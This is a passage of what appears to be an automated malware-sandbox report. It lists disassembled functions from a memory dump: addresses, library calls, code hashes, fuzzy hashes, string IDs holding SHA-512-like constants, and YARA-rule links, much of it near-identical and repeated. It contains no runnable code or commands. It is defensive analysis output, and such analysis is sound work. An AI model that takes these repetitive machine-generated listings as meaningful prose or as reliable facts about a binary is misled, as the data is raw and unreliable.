                                                                                                                                                        • API String ID: 1318688329-4060426728
                                                                                                                                                        • Opcode ID: 54dfe1d2ae7c0d195bf7156bd6f6db005620f56ddded0049ddcfad6bb3165760
                                                                                                                                                        • Instruction ID: c5bb358427bcc2aea0e05ed66ab769765244ca68499f520da75e88bbaab44791
                                                                                                                                                        • Opcode Fuzzy Hash: 54dfe1d2ae7c0d195bf7156bd6f6db005620f56ddded0049ddcfad6bb3165760
                                                                                                                                                        • Instruction Fuzzy Hash: 8751A671C052589EDB50EBB9D941BEDBBB4EF45310F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040A60D, Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040A612
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A63A
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A684
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A6CB
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A712
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A75C
                                                                                                                                                        • _strlen.LIBCMT ref: 0040A7BB
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 0iy$10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Hiy$hy
                                                                                                                                                        • API String ID: 1318688329-2762834128
                                                                                                                                                        • Opcode ID: 7c57475ff6b4bb13a09a2b34f6156393a43d6915167e36d61adad9b3c9077f98
                                                                                                                                                        • Instruction ID: d35f8b15f21dd1954cdc35b333f03dc5de7c51ca6e66c0e378e7cadf9838d53e
                                                                                                                                                        • Opcode Fuzzy Hash: 7c57475ff6b4bb13a09a2b34f6156393a43d6915167e36d61adad9b3c9077f98
                                                                                                                                                        • Instruction Fuzzy Hash: 8151A271C052589EDB50EBA9D941BEDBBB4EF45310F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00404D08, Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00404D0D
                                                                                                                                                        • _strlen.LIBCMT ref: 00404D35
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 00404D7F
                                                                                                                                                        • _strlen.LIBCMT ref: 00404DC6
                                                                                                                                                        • _strlen.LIBCMT ref: 00404E0D
                                                                                                                                                        • _strlen.LIBCMT ref: 00404E57
                                                                                                                                                        • _strlen.LIBCMT ref: 00404EB6
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 0ay$10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Hay$`y
                                                                                                                                                        • API String ID: 1318688329-4182394543
                                                                                                                                                        • Opcode ID: a6b33bcf831894bb8b98eb245c616c871116299393f1fe3cd61d9c4780d506ec
                                                                                                                                                        • Instruction ID: c5a5fc0fe5cec96fa9b2fdecf2b40389d5f10bcfd957ea7437461dcb77e2bad2
                                                                                                                                                        • Opcode Fuzzy Hash: a6b33bcf831894bb8b98eb245c616c871116299393f1fe3cd61d9c4780d506ec
                                                                                                                                                        • Instruction Fuzzy Hash: A9519371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00409D42, Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00409D47
                                                                                                                                                        • _strlen.LIBCMT ref: 00409D6F
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 00409DB9
                                                                                                                                                        • _strlen.LIBCMT ref: 00409E00
                                                                                                                                                        • _strlen.LIBCMT ref: 00409E47
                                                                                                                                                        • _strlen.LIBCMT ref: 00409E91
                                                                                                                                                        • _strlen.LIBCMT ref: 00409EF0
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Hgy$`gy$xgy
                                                                                                                                                        • API String ID: 1318688329-1989659167
                                                                                                                                                        • Opcode ID: bb1436b8fb9ee1c7e3c34234ce5caf16212fffc3b0ff647096b1dcd599cadab9
                                                                                                                                                        • Instruction ID: d820eb5c453758296bb2266e8992b3e2f92cb9812aaa01ae0b854bb01681fa8a
                                                                                                                                                        • Opcode Fuzzy Hash: bb1436b8fb9ee1c7e3c34234ce5caf16212fffc3b0ff647096b1dcd599cadab9
                                                                                                                                                        • Instruction Fuzzy Hash: A251B271C052589EDB50EBA9D941BEDBBF4EF45304F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004081CB, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004081D0
                                                                                                                                                        • _strlen.LIBCMT ref: 004081F8
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 00408242
                                                                                                                                                        • _strlen.LIBCMT ref: 00408289
                                                                                                                                                        • _strlen.LIBCMT ref: 004082D0
                                                                                                                                                        • _strlen.LIBCMT ref: 0040831A
                                                                                                                                                        • _strlen.LIBCMT ref: 00408379
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Xby$pby
                                                                                                                                                        • API String ID: 1318688329-3041996566
                                                                                                                                                        • Opcode ID: b349f90e74e88784f1659098a8ad152b082d828dff9cf25c860eec469b9ed574
                                                                                                                                                        • Instruction ID: 7f744be0e9c171b2b0d7ba9e4640e57a678475051a92aff0bfd608c140e3f002
                                                                                                                                                        • Opcode Fuzzy Hash: b349f90e74e88784f1659098a8ad152b082d828dff9cf25c860eec469b9ed574
                                                                                                                                                        • Instruction Fuzzy Hash: 43517471C052589EDB50EBA9DD41BEDBBB4EF55300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004025C9, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004025CE
                                                                                                                                                        • _strlen.LIBCMT ref: 004025F6
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 00402640
                                                                                                                                                        • _strlen.LIBCMT ref: 00402687
                                                                                                                                                        • _strlen.LIBCMT ref: 004026CE
                                                                                                                                                        • _strlen.LIBCMT ref: 00402718
                                                                                                                                                        • _strlen.LIBCMT ref: 00402777
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: (Yy$10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Xy
                                                                                                                                                        • API String ID: 1318688329-3510336905
                                                                                                                                                        • Opcode ID: ce7073b47476f1e29427c53475554fadfe7877bae40c3a918a4ea1d308ce617d
                                                                                                                                                        • Instruction ID: a622d985120479e93d8e8798ec6509aa8c5c1d3dacfe7ac46bae674ca3ab94fb
                                                                                                                                                        • Opcode Fuzzy Hash: ce7073b47476f1e29427c53475554fadfe7877bae40c3a918a4ea1d308ce617d
                                                                                                                                                        • Instruction Fuzzy Hash: 4E51A271C05258DEDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040AED8, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040AEDD
                                                                                                                                                        • _strlen.LIBCMT ref: 0040AF05
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040AF4F
                                                                                                                                                        • _strlen.LIBCMT ref: 0040AF96
                                                                                                                                                        • _strlen.LIBCMT ref: 0040AFDD
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B027
                                                                                                                                                        • _strlen.LIBCMT ref: 0040B086
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Xjy$pjy
                                                                                                                                                        • API String ID: 1318688329-2447058803
                                                                                                                                                        • Opcode ID: 392bde6b2e269a547e458f54322c7658964f4a1626bde3b223ff183d31d02e4c
                                                                                                                                                        • Instruction ID: e9f6f7956efab9e7229bf61a9d57535a13a71033c5bb0dfe835de08ccd761a6a
                                                                                                                                                        • Opcode Fuzzy Hash: 392bde6b2e269a547e458f54322c7658964f4a1626bde3b223ff183d31d02e4c
                                                                                                                                                        • Instruction Fuzzy Hash: B151A271C052589EDB50EBA9DD41BEDBBB4EF45300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00402F3C, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00402F41
                                                                                                                                                        • _strlen.LIBCMT ref: 00402F69
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 00402FB3
                                                                                                                                                        • _strlen.LIBCMT ref: 00402FFA
                                                                                                                                                        • _strlen.LIBCMT ref: 00403041
                                                                                                                                                        • _strlen.LIBCMT ref: 0040308B
                                                                                                                                                        • _strlen.LIBCMT ref: 004030EA
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: ([y$10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$Zy
                                                                                                                                                        • API String ID: 1318688329-1452038622
                                                                                                                                                        • Opcode ID: 32d31e45fc7550da766ec33005a5b801c1177f6a48b56b8309a44d6a76cad17d
                                                                                                                                                        • Instruction ID: a965084cc4c039c97f22ec3dadf0392a30e14cc4e4a1b92248dbdecf5937b509
                                                                                                                                                        • Opcode Fuzzy Hash: 32d31e45fc7550da766ec33005a5b801c1177f6a48b56b8309a44d6a76cad17d
                                                                                                                                                        • Instruction Fuzzy Hash: 71519371C052589EDB50EBA9DD41BEDBBB4EF55300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00409477, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040947C
                                                                                                                                                        • _strlen.LIBCMT ref: 004094A4
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 004094EE
                                                                                                                                                        • _strlen.LIBCMT ref: 00409535
                                                                                                                                                        • _strlen.LIBCMT ref: 0040957C
                                                                                                                                                        • _strlen.LIBCMT ref: 004095C6
                                                                                                                                                        • _strlen.LIBCMT ref: 00409625
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 0fy$10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$ey
                                                                                                                                                        • API String ID: 1318688329-774377790
                                                                                                                                                        • Opcode ID: f338de27a57e0992492e4bb1627f9781a2908854b70a16855711242b1eeca376
                                                                                                                                                        • Instruction ID: 7bd29fcc501d56f4281ad84000988f70c2641a8a0405d620b4bd4c0fbf15461f
                                                                                                                                                        • Opcode Fuzzy Hash: f338de27a57e0992492e4bb1627f9781a2908854b70a16855711242b1eeca376
                                                                                                                                                        • Instruction Fuzzy Hash: 4451A371C052589EDB50EBA9D941BEDBBB4EF45300F2081AEE518F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040BA45, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040BA4A
                                                                                                                                                        • _strlen.LIBCMT ref: 0040BA72
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040BABC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040BB03
                                                                                                                                                        • _strlen.LIBCMT ref: 0040BB4A
                                                                                                                                                        • _strlen.LIBCMT ref: 0040BB94
                                                                                                                                                        • _strlen.LIBCMT ref: 0040BBF3
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: my$10E527FADE682D1D$54FF53A5F1D36F1C$8my$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                                                                                                                                                        • API String ID: 1318688329-3055110224
                                                                                                                                                        • Opcode ID: 61c6b770b1d38f093942116e18a1564b794b8569072e01fb6f4ea9694a02cbfb
                                                                                                                                                        • Instruction ID: 3f7bd80854d7166bbe6dea3f2997e76b20b6e763fc72d676ee3165c53d6a19d9
                                                                                                                                                        • Opcode Fuzzy Hash: 61c6b770b1d38f093942116e18a1564b794b8569072e01fb6f4ea9694a02cbfb
                                                                                                                                                        • Instruction Fuzzy Hash: 9051A271D052589EDB50EBA9D941BEDBBB4EF45300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00403A9E, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 00403AA3
                                                                                                                                                        • _strlen.LIBCMT ref: 00403ACB
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 00403B15
                                                                                                                                                        • _strlen.LIBCMT ref: 00403B5C
                                                                                                                                                        • _strlen.LIBCMT ref: 00403BA3
                                                                                                                                                        • _strlen.LIBCMT ref: 00403BED
                                                                                                                                                        • _strlen.LIBCMT ref: 00403C4C
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: ]y$10E527FADE682D1D$54FF53A5F1D36F1C$8]y$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE
                                                                                                                                                        • API String ID: 1318688329-2073928212
                                                                                                                                                        • Opcode ID: 349e053518608a10d8fa541896cf0a5bceb5a230774e3d88ca906c2b8545ae77
                                                                                                                                                        • Instruction ID: be3e1a0eaa78c2038b25a0dc2acdf51ba153f3ad33ed1280567aa4fe23bf18ec
                                                                                                                                                        • Opcode Fuzzy Hash: 349e053518608a10d8fa541896cf0a5bceb5a230774e3d88ca906c2b8545ae77
                                                                                                                                                        • Instruction Fuzzy Hash: D1518371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040C57A, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 0040C57F
                                                                                                                                                        • _strlen.LIBCMT ref: 0040C5A7
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040C5F1
                                                                                                                                                        • _strlen.LIBCMT ref: 0040C638
                                                                                                                                                        • _strlen.LIBCMT ref: 0040C67F
                                                                                                                                                        • _strlen.LIBCMT ref: 0040C6C9
                                                                                                                                                        • _strlen.LIBCMT ref: 0040C728
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 0000001D.00000002.503095339.00000000007C1000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _strlen$H_prolog$DeallocateException@8Throw__onexitstd::_std::exception::exception
                                                                                                                                                        • String ID: 10E527FADE682D1D$54FF53A5F1D36F1C$A09E667F3BCC908B$B05688C2B3E6C1FD$B67AE8584CAA73B2$C6EF372FE94F82BE$xny
                                                                                                                                                        • API String ID: 1318688329-3699974422
                                                                                                                                                        • Opcode ID: 952387f6dab87d209a6edb626cd7709d3fb48a1e0f9387b3a6c530fcf7334a60
                                                                                                                                                        • Instruction ID: d61e2352111b57fc5a07dc01fa00389d2c24005564d8302c7e6cefb456e3b8db
                                                                                                                                                        • Opcode Fuzzy Hash: 952387f6dab87d209a6edb626cd7709d3fb48a1e0f9387b3a6c530fcf7334a60
                                                                                                                                                        • Instruction Fuzzy Hash: 6C51A371C052589EDB50EBA9D941BEDBBB4EF55300F2081AEE508F7242EB781E44CB69
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 004012F8, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 160COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __EH_prolog.LIBCMT ref: 004012FD
                                                                                                                                                        • _strlen.LIBCMT ref: 00401325
                                                                                                                                                          • Part of subcall function 004F20E3: __EH_prolog.LIBCMT ref: 004F20E8
                                                                                                                                                          • Part of subcall function 004F20E3: std::exception::exception.LIBCONCRT ref: 004F2111
                                                                                                                                                          • Part of subcall function 004F20E3: __CxxThrowException@8.LIBVCRUNTIME ref: 004F2130
                                                                                                                                                          • Part of subcall function 00411D9C: std::_Deallocate.LIBCONCRT ref: 00411DCC
                                                                                                                                                        • _strlen.LIBCMT ref: 0040136F
                                                                                                                                                        • _strlen.LIBCMT ref: 004013B6
                                                                                                                                                        • _strlen.LIBCMT ref: 004013FD
                                                                                                                                                        • _strlen.LIBCMT ref: 00401447
                                                                                                                                                        • _strlen.LIBCMT ref: 004014A6
                                                                                                                                                          • Part of subcall function 00680E81: __onexit.LIBCMT ref: 00680E87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001D.00000002.500810239.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001D.00000002.503075163.000000000077F000.00000040.00000001.sdmp Download File
